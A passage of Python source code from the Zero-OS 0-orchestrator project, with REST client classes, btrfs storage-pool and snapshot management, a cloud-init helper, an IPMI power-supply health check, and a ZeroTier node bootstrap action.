uri = self.client.base_url + "/nodes/"+nodeid+"/zerotiers"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteNode(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete a node
It is method for DELETE /nodes/{nodeid}
"""
uri = self.client.base_url + "/nodes/"+nodeid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetNode(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of a node
It is method for GET /nodes/{nodeid}
"""
uri = self.client.base_url + "/nodes/"+nodeid
return self.client.get(uri, None, headers, query_params, content_type)
def ListNodes(self, headers=None, query_params=None, content_type="application/json"):
"""
List all nodes
It is method for GET /nodes
"""
uri = self.client.base_url + "/nodes"
return self.client.get(uri, None, headers, query_params, content_type)
```
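A minimal usage sketch of the node endpoints above, assuming the generated `APIClient` from `zeroos.orchestrator.client` (as used in `scripts/resourcepoolinfo.py` further down) and a reachable orchestrator; the URL is hypothetical:
```python
from zeroos.orchestrator import client

api = client.APIClient('http://orchestrator:8080')  # hypothetical URL

# List nodes, then drill into the VMs and gateways of the first node.
nodes = api.nodes.ListNodes().json()
if nodes:
    nodeid = nodes[0]['id']
    vms = api.nodes.ListVMs(nodeid).json()
    gws = api.nodes.ListGateways(nodeid).json()
    print("node %s: %d vms, %d gateways" % (nodeid, len(vms), len(gws)))
```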
#### File: orchestrator/client/PortForward.py
```python
from .IPProtocol import IPProtocol
from . import client_support
class PortForward(object):
"""
auto-generated. don't touch.
"""
@staticmethod
def create(dstip, dstport, protocols, srcip, srcport):
"""
:type dstip: str
:type dstport: int
:type protocols: list[IPProtocol]
:type srcip: str
:type srcport: int
:rtype: PortForward
"""
return PortForward(
dstip=dstip,
dstport=dstport,
protocols=protocols,
srcip=srcip,
srcport=srcport,
)
def __init__(self, json=None, **kwargs):
if json is None and not kwargs:
raise ValueError('No data or kwargs present')
class_name = 'PortForward'
create_error = '{cls}: unable to create {prop} from value: {val}: {err}'
required_error = '{cls}: missing required property {prop}'
data = json or kwargs
property_name = 'dstip'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.dstip = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'dstport'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.dstport = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'protocols'
val = data.get(property_name)
if val is not None:
datatypes = [IPProtocol]
try:
self.protocols = client_support.list_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'srcip'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.srcip = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'srcport'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.srcport = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
def __str__(self):
return self.as_json(indent=4)
def as_json(self, indent=0):
return client_support.to_json(self, indent=indent)
def as_dict(self):
return client_support.to_dict(self)
```
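A short sketch of how this generated class might be used; the import paths and the `IPProtocol.tcp` member name are assumptions, since the enum definition is not shown here:
```python
from zeroos.orchestrator.client.PortForward import PortForward   # assumed package path
from zeroos.orchestrator.client.IPProtocol import IPProtocol     # assumed package path

# IPProtocol.tcp is assumed to be a valid member of the generated enum.
fwd = PortForward.create(dstip='192.168.103.2', dstport=8080,
                         protocols=[IPProtocol.tcp],
                         srcip='10.0.0.1', srcport=80)
print(fwd)            # __str__ renders the object as indented JSON
data = fwd.as_dict()  # plain dict, e.g. for NodesService.CreateGWForwards(data, gwname, nodeid)
```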
#### File: orchestrator/client/webhooks_service.py
```python
class WebhooksService:
def __init__(self, client):
self.client = client
def DeleteWebhook(self, webhookname, headers=None, query_params=None, content_type="application/json"):
"""
Delete a webhook
It is method for DELETE /webhooks/{webhookname}
"""
uri = self.client.base_url + "/webhooks/"+webhookname
return self.client.delete(uri, None, headers, query_params, content_type)
def GetWebhook(self, webhookname, headers=None, query_params=None, content_type="application/json"):
"""
Get a webhook
It is method for GET /webhooks/{webhookname}
"""
uri = self.client.base_url + "/webhooks/"+webhookname
return self.client.get(uri, None, headers, query_params, content_type)
def UpdateWebhook(self, data, webhookname, headers=None, query_params=None, content_type="application/json"):
"""
Update a webhook
It is method for PUT /webhooks/{webhookname}
"""
uri = self.client.base_url + "/webhooks/"+webhookname
return self.client.put(uri, data, headers, query_params, content_type)
def ListWebhooks(self, headers=None, query_params=None, content_type="application/json"):
"""
List all webhooks
It is method for GET /webhooks
"""
uri = self.client.base_url + "/webhooks"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateWebhook(self, data, headers=None, query_params=None, content_type="application/json"):
"""
Create Webhook
It is method for POST /webhooks
"""
uri = self.client.base_url + "/webhooks"
return self.client.post(uri, data, headers, query_params, content_type)
```
#### File: orchestrator/client/Zerotier.py
```python
from .EnumZerotierType import EnumZerotierType
from .ZerotierRoute import ZerotierRoute
from . import client_support
class Zerotier(object):
"""
auto-generated. don't touch.
"""
@staticmethod
def create(allowDefault, allowGlobal, allowManaged, assignedAddresses, bridge, broadcastEnabled, dhcp, mac, mtu, name, netconfRevision, nwid, portDeviceName, portError, routes, status, type):
"""
:type allowDefault: bool
:type allowGlobal: bool
:type allowManaged: bool
:type assignedAddresses: list[str]
:type bridge: bool
:type broadcastEnabled: bool
:type dhcp: bool
:type mac: str
:type mtu: int
:type name: str
:type netconfRevision: int
:type nwid: str
:type portDeviceName: str
:type portError: int
:type routes: list[ZerotierRoute]
:type status: str
:type type: EnumZerotierType
:rtype: Zerotier
"""
return Zerotier(
allowDefault=allowDefault,
allowGlobal=allowGlobal,
allowManaged=allowManaged,
assignedAddresses=assignedAddresses,
bridge=bridge,
broadcastEnabled=broadcastEnabled,
dhcp=dhcp,
mac=mac,
mtu=mtu,
name=name,
netconfRevision=netconfRevision,
nwid=nwid,
portDeviceName=portDeviceName,
portError=portError,
routes=routes,
status=status,
type=type,
)
def __init__(self, json=None, **kwargs):
if json is None and not kwargs:
raise ValueError('No data or kwargs present')
class_name = 'Zerotier'
create_error = '{cls}: unable to create {prop} from value: {val}: {err}'
required_error = '{cls}: missing required property {prop}'
data = json or kwargs
property_name = 'allowDefault'
val = data.get(property_name)
if val is not None:
datatypes = [bool]
try:
self.allowDefault = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'allowGlobal'
val = data.get(property_name)
if val is not None:
datatypes = [bool]
try:
self.allowGlobal = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'allowManaged'
val = data.get(property_name)
if val is not None:
datatypes = [bool]
try:
self.allowManaged = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'assignedAddresses'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.assignedAddresses = client_support.list_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'bridge'
val = data.get(property_name)
if val is not None:
datatypes = [bool]
try:
self.bridge = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'broadcastEnabled'
val = data.get(property_name)
if val is not None:
datatypes = [bool]
try:
self.broadcastEnabled = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'dhcp'
val = data.get(property_name)
if val is not None:
datatypes = [bool]
try:
self.dhcp = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'mac'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.mac = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'mtu'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.mtu = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'name'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.name = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'netconfRevision'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.netconfRevision = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'nwid'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.nwid = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'portDeviceName'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.portDeviceName = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'portError'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.portError = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'routes'
val = data.get(property_name)
if val is not None:
datatypes = [ZerotierRoute]
try:
self.routes = client_support.list_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'status'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.status = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'type'
val = data.get(property_name)
if val is not None:
datatypes = [EnumZerotierType]
try:
self.type = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
def __str__(self):
return self.as_json(indent=4)
def as_json(self, indent=0):
return client_support.to_json(self, indent=indent)
def as_dict(self):
return client_support.to_dict(self)
```
#### File: sal/atyourservice/StoragePool.py
```python
from .abstracts import AYSable
from js9 import j
class StoragePoolAys(AYSable):
def __init__(self, storagepool):
self._obj = storagepool
self.actor = 'storagepool'
def create(self, aysrepo):
try:
service = aysrepo.serviceGet(role='storagepool', instance=self._obj.name)
except j.exceptions.NotFound:
service = None
device_map, pool_status = self._obj.get_devices_and_status()
if service is None:
# create new service
actor = aysrepo.actorGet(self.actor)
args = {
'metadataProfile': self._obj.fsinfo['metadata']['profile'],
'dataProfile': self._obj.fsinfo['data']['profile'],
'devices': device_map,
'node': self._node_name,
'status': pool_status,
}
service = actor.serviceCreate(instance=self._obj.name, args=args)
else:
# update model on existing service
service.model.data.init('devices', len(device_map))
for i, device in enumerate(device_map):
service.model.data.devices[i] = device
service.model.data.status = pool_status
service.saveAll()
return service
@property
def _node_name(self):
def is_valid_nic(nic):
for exclude in ['zt', 'core', 'kvm', 'lo']:
if nic['name'].startswith(exclude):
return False
return True
for nic in filter(is_valid_nic, self._obj.node.client.info.nic()):
if len(nic['addrs']) > 0 and nic['addrs'][0]['addr'] != '':
return nic['hardwareaddr'].replace(':', '')
raise AttributeError("name not find for node {}".format(self._obj.node))
class FileSystemAys(AYSable):
def __init__(self, filesystem):
self._obj = filesystem
self.actor = 'filesystem'
def create(self, aysrepo):
actor = aysrepo.actorGet(self.actor)
args = {
'storagePool': self._obj.pool.name,
'name': self._obj.name,
# 'readOnly': ,FIXME
# 'quota': ,FIXME
}
return actor.serviceCreate(instance=self._obj.name, args=args)
```
#### File: sal/gateway/cloudinit.py
```python
import time
class CloudInit:
def __init__(self, container, config):
self.container = container
self.config = config
self.CONFIGPATH = "/etc/cloud-init"
def apply_config(self):
self.cleanup(self.config.keys())
for key, value in self.config.items():
fpath = "%s/%s" % (self.CONFIGPATH, key)
self.container.upload_content(fpath, value)
if not self.is_running():
self.start()
def cleanup(self, macaddresses):
configs = self.container.client.filesystem.list(self.CONFIGPATH)
for config in configs:
if config["name"] not in macaddresses:
self.container.client.filesystem.remove("%s/%s" % (self.CONFIGPATH, config["name"]))
def start(self):
if not self.is_running():
self.container.client.system(
'cloud-init-server \
-bind 127.0.0.1:8080 \
-config {config}'
.format(config=self.CONFIGPATH),
id='cloudinit.{}'.format(self.container.name))
start = time.time()
while time.time() < start + 10:
if self.is_running():
return
time.sleep(0.5)
raise RuntimeError('Failed to start cloudinit server')
def is_running(self):
for port in self.container.client.info.port():
if port['network'] == 'tcp' and port['port'] == 8080 and port['ip'] == '127.0.0.1':
return True
return False
```
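A minimal sketch of driving the `CloudInit` helper above; `container` is assumed to be an orchestrator sal Container, and the cloud-config payloads are made up:
```python
# One config entry per MAC address; apply_config() writes each value to /etc/cloud-init/<mac>,
# removes stale files, and starts the cloud-init server if it is not already listening.
config = {
    '54:42:01:02:03:04': '#cloud-config\nhostname: vm-1\n',
    '54:42:0a:0b:0c:0d': '#cloud-config\nhostname: vm-2\n',
}
ci = CloudInit(container, config)
ci.apply_config()
```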
#### File: sal/healthchecks/powersupply.py
```python
from ..healthcheck import IPMIHealthCheck
descr = """
Checks the power redundancy of a node using IPMItool.
Result will be shown in the "Hardware" section of the Grid Portal / Status Overview / Node Status page.
"""
class PowerSupply(IPMIHealthCheck):
def __init__(self, node):
resource = '/nodes/{}'.format(node.name)
super().__init__(id='pw-supply', name='Power Supply', category="Hardware", resource=resource)
self.node = node
self.ps_errmsgs = [
"Power Supply AC lost",
"Failure detected",
"Predictive failure",
"AC lost or out-of-range",
"AC out-of-range, but present",
"Config Erro",
"Power Supply Inactive"]
def run(self, container):
ps_errmsgs = [x.lower() for x in self.ps_errmsgs if x.strip()]
linehaserrmsg = lambda line: any([x in line.lower() for x in ps_errmsgs])
out = self.execute_ipmi(container, """ipmitool -c sdr type "Power Supply" """)
if out:
# SAMPLE 1:
# root@du-conv-3-01:~# ipmitool -c sdr type "Power Supply"
# PS1 Status , C8h , ok , 10.1 , Presence detected
# PS2 Status,C9h , ok , 10.2 , Presence detected
# SAMPLE 2:
# root@stor-04:~# ipmitool -c sdr type "Power Supply"
# PSU1_Status , DEh , ok , 10.1 , Presence detected
# PSU2_Status , DFh , ns , 10.2 , No Reading
# PSU3_Status , E0h , ok , 10.3 , Presence detected
# PSU4_Status , E1h , ns , 10.4 , No Reading
# PSU Redundancy , E6h , ok , 21.1 , Fully Redundant
# SAMPLE 3:
# root@stor-01:~# ipmitool -c sdr type "Power Supply"
# PSU1_Status , DEh , ok , 10.1 , Presence detected , Power Supply AC lost
# PSU2_Status , DFh , ns , 10.2 , No Reading
# PSU3_Status , E0h , ok , 10.3 , Presence detected
# PSU4_Status , E1h , ok , 10.4 , Presence detected
# PSU Redundancy , E6h , ok , 21.1 , Redundancy Lost
# PSU Alert , 16h , ns , 208.1 , Event-Only
psu_redun_in_out = "PSU Redundancy".lower() in out.lower()
is_fully_redundant = True if "fully redundant" in out.lower() else False
for line in out.splitlines():
if "status" in line.lower():
parts = [part.strip() for part in line.split(",")]
id_, presence = parts[0], parts[-1]
id_ = id_.strip("Status").strip("_").strip() # clean the power supply name.
if linehaserrmsg(line):
if psu_redun_in_out and is_fully_redundant:
self.add_message(id=id_, status='SKIPPED', text="Power redundancy problem on %s (%s)" % (id_, presence))
else:
self.add_message(id=id_, status='WARNING', text="Power redundancy problem on %s (%s)" % (id_, presence))
else:
self.add_message(id=id_, status='OK', text="Power supply %s is OK" % id_)
else:
self.add_message(id="SKIPPED", status='SKIPPED', text="No data for Power Supplies")
```
#### File: orchestrator/sal/StoragePool.py
```python
from .abstracts import Mountable
import os
import time
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def _prepare_device(node, devicename):
logger.debug("prepare device %s", devicename)
ss = devicename.split('/')
if len(ss) < 3:
raise RuntimeError("bad device name: {}".format(devicename))
name = ss[2]
disk = node.disks.get(name)
if disk is None:
raise ValueError("device {} not found".format(name))
node.client.system('parted -s /dev/{} mklabel gpt mkpart primary 1m 100%'.format(name)).get()
now = time.time()
# check that the partition is ready and writable
while now + 60 > time.time():
try:
disk = node.disks.get(name)
if len(disk.partitions) > 0:
partition = disk.partitions[0]
resp = node.client.bash('test -b {0} && dd if={0} of=/dev/null bs=4k count=1024'.format(partition.devicename)).get()
if resp.state == 'SUCCESS':
return partition
except:
time.sleep(1)
continue
else:
raise RuntimeError("Failed to create partition")
class StoragePools:
def __init__(self, node):
self.node = node
@property
def client(self):
return self.node.client
def list(self):
storagepools = []
btrfs_list = self.client.btrfs.list()
for btrfs in btrfs_list:
if btrfs['label'].startswith('sp_'):
name = btrfs['label'].split('_', 1)[1]
devicenames = [device['path'] for device in btrfs['devices']]
storagepools.append(StoragePool(self.node, name, devicenames))
return storagepools
def get(self, name):
for pool in self.list():
if pool.name == name:
return pool
raise ValueError("Could not find StoragePool with name {}".format(name))
def create(self, name, devices, metadata_profile, data_profile, overwrite=False):
label = 'sp_{}'.format(name)
logger.debug("create storagepool %s", label)
device_names = []
for device in devices:
part = _prepare_device(self.node, device)
device_names.append(part.devicename)
self.client.btrfs.create(label, device_names, metadata_profile, data_profile, overwrite=overwrite)
pool = StoragePool(self.node, name, device_names)
return pool
class StoragePool(Mountable):
def __init__(self, node, name, devices):
self.node = node
self.devices = devices
self.name = name
self._mountpoint = None
self._ays = None
@classmethod
def from_ays(cls, service, password, logger=None):
from .Node import Node
node = Node.from_ays(service.parent)
devices = []
for deviceObj in service.model.data.devices:
devices.append(deviceObj.device)
pool = cls(node=node,
name=service.name,
devices=devices)
return pool
@property
def client(self):
return self.node.client
@property
def devicename(self):
return 'UUID={}'.format(self.uuid)
def mount(self, target=None):
if target is None:
target = os.path.join('/mnt/storagepools/{}'.format(self.name))
return super().mount(target)
def delete(self, zero=True):
"""
Destroy storage pool
param zero: write zeros (nulls) to the first 500MB of each disk in this storagepool
"""
while self.mountpoint:
self.umount()
partitionmap = {}
for disk in self.node.disks.list():
for partition in disk.partitions:
partitionmap[partition.name] = partition
for device in self.devices:
diskpath = os.path.basename(device)
partition = partitionmap.get(diskpath)
if partition:
disk = partition.disk
self.client.disk.rmpart(disk.name, 1)
if zero:
self.client.bash('test -b /dev/{0} && dd if=/dev/zero bs=1M count=500 of=/dev/{0}'.format(diskpath)).get()
return
@property
def mountpoint(self):
mounts = self.node.list_mounts()
for device in self.devices:
for mount in mounts:
if mount.device == device:
options = mount.options.split(',')
if 'subvol=/' in options:
return mount.mountpoint
def is_device_used(self, device):
"""
check if the device passed as argument is already part of this storagepool
@param device: str e.g: /dev/sda
"""
for d in self.devices:
if d.startswith(device):
return True
return False
def device_add(self, *devices):
to_add = []
for device in devices:
if self.is_device_used(device):
continue
part = _prepare_device(self.node, device)
logger.debug("add device %s to %s", device, self)
to_add.append(part.devicename)
self.client.btrfs.device_add(self._get_mountpoint(), *to_add)
self.devices.extend(to_add)
def device_remove(self, *devices):
self.client.btrfs.device_remove(self._get_mountpoint(), *devices)
for device in devices:
if device in self.devices:
logger.debug("remove device %s to %s", device, self)
self.devices.remove(device)
@property
def fsinfo(self):
if self.mountpoint is None:
raise ValueError("can't get fsinfo if storagepool is not mounted")
return self.client.btrfs.info(self.mountpoint)
@mountpoint.setter
def mountpoint(self, value):
# do not do anything; mountpoint is dynamic
return
def _get_mountpoint(self):
mountpoint = self.mountpoint
if not mountpoint:
raise RuntimeError("Can not perform action when filesystem is not mounted")
return mountpoint
@property
def info(self):
for fs in self.client.btrfs.list():
if fs['label'] == 'sp_{}'.format(self.name):
return fs
return None
def raw_list(self):
mountpoint = self._get_mountpoint()
return self.client.btrfs.subvol_list(mountpoint) or []
def get_devices_and_status(self):
device_map = []
disks = self.client.disk.list()['blockdevices']
pool_status = 'healthy'
for device in self.devices:
info = None
for disk in disks:
disk_name = "/dev/%s" % disk['kname']
if device == disk_name and disk['mountpoint']:
info = disk
break
for part in disk.get('children', []) or []:
if device == "/dev/%s" % part['kname']:
info = part
break
if info:
break
status = 'healthy'
if info['subsystems'] != 'block:virtio:pci':
result = self.client.bash("smartctl -H %s > /dev/null ;echo $?" % disk_name).get()
exit_status = int(result.stdout)
if exit_status & 1 << 0:
status = "unknown"
pool_status = 'degraded'
if (exit_status & 1 << 2) or (exit_status & 1 << 3):
status = 'degraded'
pool_status = 'degraded'
device_map.append({
'device': device,
'partUUID': info['partuuid'] or '' if info else '',
'status': status,
})
return device_map, pool_status
def list(self):
subvolumes = []
for subvol in self.raw_list():
path = subvol['Path']
type_, _, name = path.partition('/')
if type_ == 'filesystems':
subvolumes.append(FileSystem(name, self))
return subvolumes
def get(self, name):
"""
Get Filesystem
"""
for filesystem in self.list():
if filesystem.name == name:
return filesystem
raise ValueError("Could not find filesystem with name {}".format(name))
def exists(self, name):
"""
Check if filesystem with name exists
"""
for subvolume in self.list():
if subvolume.name == name:
return True
return False
def create(self, name, quota=None):
"""
Create filesystem
"""
logger.debug("Create filesystem %s on %s", name, self)
mountpoint = self._get_mountpoint()
fspath = os.path.join(mountpoint, 'filesystems')
self.client.filesystem.mkdir(fspath)
subvolpath = os.path.join(fspath, name)
self.client.btrfs.subvol_create(subvolpath)
if quota:
self.client.btrfs.subvol_quota(subvolpath, str(quota))
return FileSystem(name, self)
@property
def size(self):
total = 0
fs = self.info
if fs:
for device in fs['devices']:
total += device['size']
return total
@property
def uuid(self):
fs = self.info
if fs:
return fs['uuid']
return None
@property
def used(self):
total = 0
fs = self.info
if fs:
for device in fs['devices']:
total += device['used']
return total
@property
def ays(self):
if self._ays is None:
from zeroos.orchestrator.sal.atyourservice.StoragePool import StoragePoolAys
self._ays = StoragePoolAys(self)
return self._ays
def __repr__(self):
return "StoragePool <{}>".format(self.name)
class FileSystem:
def __init__(self, name, pool):
self.name = name
self.pool = pool
self.subvolume = "filesystems/{}".format(name)
self.path = os.path.join(self.pool.mountpoint, self.subvolume)
self.snapshotspath = os.path.join(self.pool.mountpoint, 'snapshots', self.name)
self._ays = None
@property
def client(self):
return self.pool.node.client
def delete(self, includesnapshots=True):
"""
Delete filesystem
"""
paths = [fs['Path'] for fs in self.client.btrfs.subvol_list(self.path)]
paths.sort(reverse=True)
for path in paths:
rpath = os.path.join(self.path, os.path.relpath(path, self.subvolume))
self.client.btrfs.subvol_delete(rpath)
self.client.btrfs.subvol_delete(self.path)
if includesnapshots:
for snapshot in self.list():
snapshot.delete()
self.client.filesystem.remove(self.snapshotspath)
def get(self, name):
"""
Get snapshot
"""
for snap in self.list():
if snap.name == name:
return snap
raise ValueError("Could not find snapshot {}".format(name))
def list(self):
"""
List snapshots
"""
snapshots = []
if self.client.filesystem.exists(self.snapshotspath):
for fileentry in self.client.filesystem.list(self.snapshotspath):
if fileentry['is_dir']:
snapshots.append(Snapshot(fileentry['name'], self))
return snapshots
def exists(self, name):
"""
Check if a snapshot exists
"""
return any(snapshot.name == name for snapshot in self.list())
def create(self, name):
"""
Create snapshot
"""
logger.debug("create snapshot %s on %s", name, self.pool)
snapshot = Snapshot(name, self)
if self.exists(name):
raise RuntimeError("Snapshot path {} exists.")
self.client.filesystem.mkdir(self.snapshotspath)
self.client.btrfs.subvol_snapshot(self.path, snapshot.path)
return snapshot
@property
def ays(self):
if self._ays is None:
from JumpScale.sal.g8os.atyourservice.StoragePool import FileSystemAys
self._ays = FileSystemAys(self)
return self._ays
def __repr__(self):
return "FileSystem <{}: {!r}>".format(self.name, self.pool)
class Snapshot:
def __init__(self, name, filesystem):
self.filesystem = filesystem
self.name = name
self.path = os.path.join(self.filesystem.snapshotspath, name)
self.subvolume = "snapshots/{}/{}".format(self.filesystem.name, name)
@property
def client(self):
return self.filesystem.pool.node.client
def rollback(self):
self.filesystem.delete(False)
self.client.btrfs.subvol_snapshot(self.path, self.filesystem.path)
def delete(self):
self.client.btrfs.subvol_delete(self.path)
def __repr__(self):
return "Snapshot <{}: {!r}>".format(self.name, self.filesystem)
```
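A minimal sketch tying the classes above together, in the same way `templates/etcd_cluster/actions.py` below uses them; `node` is assumed to be a connected `zeroos.orchestrator.sal.Node` and `/dev/sdb` is a placeholder device:
```python
from zeroos.orchestrator.sal.StoragePool import StoragePools

pools = StoragePools(node)
pool = pools.create('demo', ['/dev/sdb'], 'single', 'single')  # partitions the device and creates btrfs pool sp_demo
pool.mount()                                                   # mounts under /mnt/storagepools/demo by default
fs = pool.create('data', quota='10G')                          # btrfs subvolume filesystems/data (quota passed to btrfs)
snap = fs.create('before-upgrade')                             # snapshot under snapshots/data/before-upgrade
# later: snap.rollback() restores the filesystem to the snapshot state
```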
#### File: 0-orchestrator/scripts/resourcepoolinfo.py
```python
from zeroos.orchestrator import client
import prettytable
def main(url):
api = client.APIClient(url)
table = prettytable.PrettyTable(["Node", "VMS", "Containers"])
for node in api.nodes.ListNodes().json():
runningcontainers = 0
totalcontainers = 0
runningvms = 0
totalvms = 0
for container in api.nodes.ListContainers(node['id']).json():
if container['status'] == 'running':
runningcontainers += 1
totalcontainers += 1
for vm in api.nodes.ListVMs(node['id']).json():
if vm['status'] == 'running':
runningvms += 1
totalvms += 1
table.add_row([node['hostname'], "{}/{}".format(runningvms, totalvms), "{}/{}".format(runningcontainers, totalcontainers)])
print(table.get_string(sortby='Node'))
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', help='URL of 0 rest api')
options = parser.parse_args()
main(options.url)
```
#### File: templates/bootstrap.zero-os/actions.py
```python
from js9 import j
def input(job):
for required in['zerotierNetID', 'zerotierToken']:
if not job.model.args.get(required):
raise j.exceptions.Input("{} cannot be empty".format(required))
return job.model.args
def bootstrap(job):
from zerotier import client
service = job.service
token = service.model.data.zerotierToken
netid = service.model.data.zerotierNetID
zerotier = client.Client()
zerotier.set_auth_header('bearer {}'.format(token))
resp = zerotier.network.listMembers(netid)
members = resp.json()
job.logger.info("Received %s members" % len(members))
# First make sure all members that need to be authorized anyway are authorized
to_process = list()
for member in members:
if member['nodeId'] in service.model.data.authorizedZerotierMembers:
if not member['config']['authorized']:
job.logger.info("Authorizing %s" % member['nodeId'])
member['config']['authorized'] = True
zerotier.network.updateMember(member, member['nodeId'], netid)
else:
to_process.append(member)
# In a second pass process all the others
for member in to_process:
try:
try_authorize(job, job.logger, netid, member, zerotier)
except Exception as err:
job.logger.error(str(err))
member['config']['authorized'] = False
zerotier.network.updateMember(member, member['nodeId'], netid)
def delete_node(job):
"""
this method will be called from the node.zero-os service to remove the node from zerotier
"""
from zerotier import client
node = job.service.aysrepo.serviceGet(role='node', instance=job.model.args['node_name'])
service = job.service
token = service.model.data.zerotierToken
netid = service.model.data.zerotierNetID
zerotier = client.Client()
zerotier.set_auth_header('bearer {}'.format(token))
resp = zerotier.network.listMembers(netid)
members = resp.json()
for member in members:
if node.model.data.redisAddr in member['config']['ipAssignments']:
try:
zerotier.network.deleteMember(member['nodeId'], netid)
except Exception as err:
job.logger.error(str(err))
break
def try_authorize(job, logger, netid, member, zerotier):
import time
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
service = job.service
job.context['token'] = get_jwt_token(service.aysrepo)
if not member['online'] or member['config']['authorized']:
job.logger.info("Skipping member %s: online=%s, authorized=%s" % (member['nodeId'], member['online'], member['config']['authorized']))
return
# authorize the new member
logger.info("authorize new member {}".format(member['nodeId']))
member['config']['authorized'] = True
zerotier.network.updateMember(member, member['nodeId'], netid)
# get assigned ip of this member
resp = zerotier.network.getMember(member['nodeId'], netid)
member = resp.json()
for _ in range(20):
if len(member['config']['ipAssignments']):
break
time.sleep(1)
resp = zerotier.network.getMember(member['nodeId'], netid)
member = resp.json()
else:
raise RuntimeError('Node %s did not get an ip assigned' % (member['nodeId']))
zerotier_ip = member['config']['ipAssignments'][0]
# test if we can connect to the new member
node = Node(zerotier_ip, password=get_jwt_token(service.aysrepo))
node.client.testConnectionAttempts = 0
node.client.timeout = 30
for attempt in range(5):
try:
logger.info("connection to g8os with IP: {}".format(zerotier_ip))
node.client.ping()
break
except:
continue
else:
raise RuntimeError("can't connect, unauthorize member IP: {}".format(zerotier_ip))
